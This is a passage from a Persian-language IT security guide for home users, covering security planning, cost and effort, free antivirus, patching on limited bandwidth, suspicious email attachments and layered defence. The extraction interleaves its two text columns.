‫ﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﻧﺎﻣﻨﺎﺳﺐ‬ ‫•‬ ‫‪...‬ﺷﺨﺼﻲ ﺑﻪ ﺧﺎﻧﻪ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ‬
‫ﻭ ﺩﺭ ﻏﻴﺎﺏ ﻣﺴﺌﻮﻝ ﻣﺮﺑﻮﻃﻪ(‬ ‫ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻳﺴﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﻛﻪ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻧﺰﺩﻳﻜﻲ ﺑﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﺑﺎ ﺧﻮﺩ ﺑﺒﺮﺩ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻫﻤﻴﺖ ﻣﻮﺿﻮﻉ "ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ" ﺭﺍ ﻣـﺸﺨﺺ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻛﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻩﺍﻳﺪ ﺍﻣﻨﻴﺖ ﻣﻮﺿﻮﻋﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ‬ ‫‪...‬ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﭘﺎﻙ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﺳﺖ‪ ،‬ﮔﺎﻡ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﻃﺮﺡ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ‬ ‫‪...‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ‪ .‬ﺍﻳﻦ ﺩﺍﺩﻩﻫـﺎ‬
‫ﺷﺪﻥ ﻣﻲﺑﺎﺷﺪ‪:‬‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺑﺎﺷﻨﺪ ﺍﺯ ﻗﺒﻴﻞ‪ :‬ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ‬
‫ﺑﺎﻧﻜﻲ‪ ،‬ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮ ﹺﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ‬

‫‪4‬‬ ‫‪Online Shopping‬‬


‫‪٥١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ‬ ‫ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟‬ ‫•‬
‫ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ‬ ‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬ ‫•‬
‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ‬ ‫ﺗﺎ ﭼﻪ ﺣﺪ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟‬ ‫•‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ‬ ‫ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪،‬‬ ‫•‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ‪.‬‬ ‫ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟‬
‫ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬـﺎﻳﻲ ﻃـﺮﺡ ﺭﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺮﺍﻱ‬ ‫•‬
‫ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪،‬‬ ‫ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟‬
‫ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺳﺆﺍﻻﺕ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﺷﻤﺎ‬


‫ﺑﻠﻪ؛ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺎﻳﺪ ﻋﻤﻠﻜـﺮﺩ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬ ‫ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﻫﺰﻳﻨﻪ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﺍﻧﺘﺨﺎﺏ ﻃﺮﺣﻲ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ‪ ،‬ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬ ‫ﻭ ﺯﻣﺎﻥ ﻻﺯﻡ ﻭ ﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺟـﺎﻧﺒﻲ ﺁﻥ ﺩﺍﺭﻳـﺪ‪ .‬ﺑـﺪﻭﻥ ﻭﺟـﻮﺩ‬
‫ﺁﮔﺎﻫﻲ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ‪ -‬ﻛﻪ ﺑﺎﻳﺪ ﺗﺎ ﺣﺪ ﺍﻣﻜـﺎﻥ‬ ‫ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨـﺪ ﺩﭼـﺎﺭ ﻧﺎﺍﻣﻴـﺪﻱ‬
‫ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ ‪ -‬ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ‬ ‫ﺷﻮﻳﺪ؛ ﻳﺎ ﭘﺮﻭﮊﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻟﻐﻮ ﻧﻤـﻮﺩﻩ ﻭ ﺳـﭙﺲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ‬
‫ﺟﺪﻳﺪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺬﺍﺏ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ‪-‬‬ ‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﻴﺎﺑﻴﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺗﻮﺿـﻴﺢ‬
‫ﺧﺼﻮﺻﹰﺎ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﺷﺒﻜﻪ ﻭ ﺍﺭﺳـﺎﻝ ﻭ ﺩﺭﻳﺎﻓـﺖ‬ ‫ﺑﻴﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ‪ -‬ﺑﺎﻋﺚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ‬
‫ﻣﻲ ﮔﺮﺩﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ‬ ‫ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﻮﺭﺩ ﻧﻈﺮ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭﻟـﻲ ﺑـﺮﺍﻱ‬ ‫ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﻻﺯﻡ ﺑﺎﺷـﺪ ﻛـﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺧـﺎﺹ ﺁﻧـﺮﺍ‬ ‫ﭼﻨﺪﺍﻧﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻻﺯﻡ ﻧﻴـﺰ ﺁﻧﭽﻨـﺎﻥ ﮔﺮﺍﻧﻘﻴﻤـﺖ‬
‫‪ download‬ﻭ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ ﻧـﺴﺒﺖ ﺑـﻪ‬ ‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺣﺘﻲ ﻭﻳـﺮﻭﺱ ﻳﺎﺑﻬـﺎ‪ ٥‬ﻛـﻪ ﺭﺍﻳﺠﺘـﺮﻳﻦ ﻛـﺎﻻﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ‬ ‫ﻫﺴﺘﻨﺪ ﺩﺭ ﻗﺎﻟﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ‪ ٦‬ﺩﺭ ﺩﺳـﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺑـﻪ‬ ‫ﺷــﺎﻳﺎﻥ ﺫﻛــﺮ ﺍﺳــﺖ ﻛــﻪ ﻓﻬﺮﺳــﺖ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋــﻪﻛﻨﻨــﺪﺓ‬
‫ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﺩ ﺻﺮﻓﻨﻈﺮ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺁﻳﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻃﺮﺡ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻳﺎ ﺑـﺮﺍﻱ‬ ‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬
‫ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟‬
‫ﻣﺴﻠﻤﹰﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻭ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺁﻥ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧـﻮﺩ‬
‫ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﺴﺌﻮﻝ ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺘﻲ ﺳﻴـﺴﺘﻢ‬ ‫ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﻣﺎ ﻣﻴﺰﺍﻥ ﺍﻳﻦ ﺯﻣـﺎﻥ ﺯﻳـﺎﺩ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﺧﻮﺩ ﻫﺴﺘﻴﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺘﺮ ﺍﻧﺠـﺎﻡ‬ ‫ﺧﺼﻮﺹ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴـﺪ ﻭ‬
‫ﺷﺪﻥ ﻛﺎﺭ ﺍﺯ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪.‬‬ ‫ﺳﭙﺲ ﻭﻇﺎﻳﻒ ﺣﻔﺎﻇﺘﻲ ﻣﻌﻤﻮﻝ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﺑﻪ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ‪ ٧‬ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ‬ ‫•‬ ‫ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ‬
‫ﺗﺎ ﭼﻪ ﺣﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟‬
‫ﺑﺎﻧﺪ‪ ٨‬ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ‬
‫ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ‬ ‫ﻣﻴﺰﺍﻥ ﻣﺸﻜﻼﺕ ﺑﻪ ﺩﻳﺪﮔﺎﻩ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ‬ ‫ﺁﻧﭽﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻫﺮﮔـﺰ ﻧﺒﺎﻳـﺪ ﻓﻜـﺮ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ‬ ‫ﻛﻨﻴﺪ ﻛﻪ ﻫﺮ ﭼﻴﺰﻱ ﺩﺭ ﻧﻮﻉ ﺧﻮﺩ ﻭﺍﺟﺪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺜـﺎﻝ‬
‫ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬ ‫ﺍﮔﺮ ﺷﺨﺼﻲ ﺩﺭ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺿـﻤﻴﻤﻪﺍﻱ‬

‫‪7‬‬ ‫‪Patches‬‬ ‫‪5‬‬ ‫‪Virus Scanners‬‬


‫‪8‬‬ ‫‪Bandwidth‬‬ ‫‪6‬‬ ‫‪Freeware‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٥٢‬‬

‫ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ‬ ‫ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ‬ ‫ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ‬
‫ﻧﻴﺴﺖ‪ .‬ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ‬ ‫ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ‪ ،‬ﻗـﻮﺍﻧﻴﻦ‪ ،‬ﻭ ﻣﻼﺣﻈـﺎﺕ‬ ‫ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ ‪ download‬ﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ‬
‫ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬ ‫ﻻ‬
‫ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ‬
‫ﻣﺸﻜﻠﺘﺮ ﺍﺯ ‪ download‬ﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ‬
‫ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ‬
‫ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛‬
‫ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺍﺯ‬
‫ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ‬ ‫ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ‬ ‫•‬
‫ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ‬ ‫ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ‬ ‫ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻴﺎﻭﺭﻳﺪ‪ .‬ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ‬ ‫ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ‬
‫ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟‬ ‫ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ‬ ‫ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫‪٩‬‬
‫ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ‪:‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ‬
‫ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ‬ ‫•‬ ‫ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬
‫ﺗﻌﻤﻴﺮ ﺷﻮﺩ‪.‬‬ ‫ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ "‪ "Update‬ﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ‬
